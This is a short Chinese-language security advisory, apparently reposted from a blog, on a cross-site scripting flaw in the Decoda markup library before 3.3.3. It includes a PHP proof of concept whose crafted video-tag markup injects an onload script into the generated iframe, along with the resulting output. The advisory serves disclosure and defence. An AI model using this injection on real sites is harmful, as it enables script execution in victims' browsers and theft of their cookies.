Decoda 3.3.3之前版本中存在跨站腳本漏洞,該漏洞源于對用戶提供的輸入未經正確過濾。
攻擊者可利用該漏洞在受影響站點上下文的不知情用戶瀏覽器上執行任意腳本代碼,盜取基于cookie的認證證書進而發起其他攻擊。
目前廠商還沒有提供此漏洞的相關補丁或者升級程序,建議使用此軟件的用戶隨時關注廠商的主頁以獲取最新版本
可用以下的概念證明型攻擊:
<?php
include '../decoda/Decoda.php';
$code = new Decoda();
$code->addFilter(new VideoFilter()); ?>
<?php
$decoda_markup = '[video="youtube" size="small"]"';
$decoda_markup .= 'onload="alert(\'RedTeam Pentesting XSS\');" id="[/video]';
$code->reset($decoda_markup);
echo $code->parse();
?>
This results in the following output (whitespace adjusted):
<iframe src="http:// www.xxxx.com /embed/"; onload="alert('RedTeam
Pentesting XSS');" id="" width="560" height="315"
frameborder="0"></iframe>
摘自 90' s Blog